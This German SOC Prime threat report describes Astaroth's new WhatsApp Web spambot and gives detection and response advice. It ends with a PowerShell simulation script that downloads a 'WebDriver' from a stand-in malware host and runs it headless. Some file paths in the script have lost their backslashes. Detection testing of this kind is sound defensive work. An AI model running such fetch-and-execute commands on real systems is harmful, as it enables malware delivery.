SOC Prime Bias: Hoch

30 Jul 2026 15:38 UTC

Astaroth Fügt Eine Neue Spambot-Komponente Für E-Mail-Kampagnen Hinzu

Author Photo
SOC Prime Team linkedin icon Folgen
Astaroth Fügt Eine Neue Spambot-Komponente Für E-Mail-Kampagnen Hinzu
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Die Betreiber des Astaroth-Botnetzes haben eine neue WhatsApp-Web-Spambot-Komponente hinzugefügt, um ihre Reichweite im lateinamerikanischen eCrime-Ökosystem zu erweitern. Das Modul verwendet eine kopflose Browserautomatisierung, um kompromittierte Opfer in Verteilungsknoten umzuwandeln, indem bösartige Nachrichten an deren WhatsApp-Kontakte gesendet werden. Diese Entwicklung markiert einen Wandel vom traditionellen E-Mail-Spam hin zu sozialen Nachrichtenplattformen.

Untersuchung

Die Untersuchung umfasste eine detaillierte technische Analyse des Astaroth-Spambots, bei der AES-CTS-Verschlüsselung, ein komplexer sechsstufiger String-Verschleierungsprozess und benutzerdefinierte Konfigurationsstrukturen aufgedeckt wurden. Die Forscher identifizierten beträchtliche Codeähnlichkeiten zwischen den Astaroth- und Vareg-Spambots, was auf gemeinsame Entwickler oder Absprachen zum Code-Austausch hindeutet. Die Analyse bestätigte auch den Missbrauch legitimer Browserautomatisierungs-Frameworks, einschließlich WebDriver und WPPConnect/WA-JS, um verdeckte Spam-Kampagnen durchzuführen.

Minderung

Organisationen sollten Benutzer über auf WhatsApp basierende Social-Engineering-Angriffe aufklären und davon abraten, Dateien von unbekannten Kontakten zu öffnen oder auszuführen. Browser-Download-Schutzmaßnahmen sollten aktiviert werden, und nicht autorisierte WebDriver-Downloads und -Ausführungen sollten genau überwacht werden. Sicherheitsteams sollten auch auf verdächtige Verzeichniserstellungen im Windows-Temp-Ordner achten und in Betracht ziehen, WPPConnect/WA-JS zu blockieren, wenn es nicht für legitime geschäftliche Zwecke benötigt wird.

Antwort

Wenn Astaroth-Aktivitäten erkannt werden, sollten betroffene Endpunkte sofort isoliert werden, um die weitere Verbreitung von Spam und Malware-Lieferungen zu stoppen. Ermittler sollten nach kopflosen Browserprozessen und ungewöhnlichen ChromeAuto_ Verzeichnissen innerhalb von C:UsersPublicTempsuchen. Identifizierte WebDriver-Prozesse sollten einer forensischen Analyse unterzogen werden, und die Netzwerkaktivitäten sollten auf nicht autorisierte Verbindungen zu bekannter Astaroth C2-Infrastruktur überprüft werden.

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Preflight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Der Angreifer beabsichtigt, ein automatisiertes WhatsApp-Spamming-Modul einzusetzen. Dazu nutzt er zunächst eine Living-off-the-land-Technik, indem er PowerShell verwendet, um einen bestimmten WebDriver Binary in ein lokales Verzeichnis herunterzuladen. Sobald das Tool vorhanden ist, führt der Angreifer das Binary unter Verwendung der --headless and --disable-infobars Flags aus. Dies ermöglicht es der Automatisierung, im Hintergrund unsichtbar für den Benutzer zu laufen und so die Spamming-Kampagne zu erleichtern, während der Fußabdruck auf dem Host minimiert wird.

  • Regressionstest-Skript:

    # Astaroth Spambot Simulationsskript
    # Dieses Skript simuliert die Download- und Ausführungssequenz, die in der Erkennungsregel definiert ist.
    
    $workDir = "$env:TEMPWebDriverSimulation"
    if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory }
    Set-Location $workDir
    
    # 1. Download simulieren (löst Auswahl_webdriver_download aus)
    Write-Host "[+] WebDriver-Download über PowerShell simulieren..."
    $dummyWebDriver = "WebDriver.exe"
    New-Item -Path $dummyWebDriver -ItemType File
    # Nachahmen der Befehlszeile, nach der die Regel sucht
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'"
    
    # 2. Ausführung simulieren (löst Auswahl_webdriver_execution und Auswahl_session_creation aus)
    Write-Host "[+] WebDriver-Ausführung mit kopflosen Flags simulieren..."
    # Wir verwenden Start-Process, um sicherzustellen, dass die Befehlszeile als Prozess-Erstellungsereignis erfasst wird
    Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow
  • Bereinigungskommandos:

    # Bereinigung der Simulationsartefakte
    Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force
    Write-Host "[+] Bereinigung abgeschlossen."